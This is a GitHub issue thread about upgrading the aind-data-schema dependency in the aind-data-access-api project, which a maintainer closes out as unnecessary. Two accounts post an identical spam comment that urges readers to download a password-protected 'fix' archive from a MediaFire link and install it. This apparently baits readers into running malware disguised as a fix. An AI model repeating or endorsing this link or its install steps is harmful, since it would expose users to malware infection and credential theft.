### ISSUE TITLE
Upgrade aind-data-schema v1.0

### ISSUE THREAD

**Issue by jtyoung84** [AllenNeuralDynamics/aind-data-access-api#86]
# User story
As a user, I want to use the latest aind-data-schema version, so I can attach the latest metadata to data assets on upload.

# Acceptance criteria
- [ ] Update versions of aind-data-schema and aind-data-transfer-models
- [ ] Update unit tests appropriately

# Sprint Ready Checklist 
- [ ] 1. Acceptance criteria defined 
- [ ] 2. Team understands acceptance criteria 
- [ ] 3. Team has defined solution / steps to satisfy acceptance criteria 
- [ ] 4. Acceptance criteria is verifiable / testable 
- [ ] 5. External / 3rd Party dependencies identified
- [ ] 6. Ticket is prioritized and sized

**Comment by deverchettychandrashekar** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by uno-zero** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by helen-m-lin** [comment]
@jtyoung84 aind-data-access-api does not seem to require aind-data-schema or aind-data-transfer-models. Checked nested dependencies too. I think no action is needed here.

**Comment by jtyoung84** [comment]
Cool
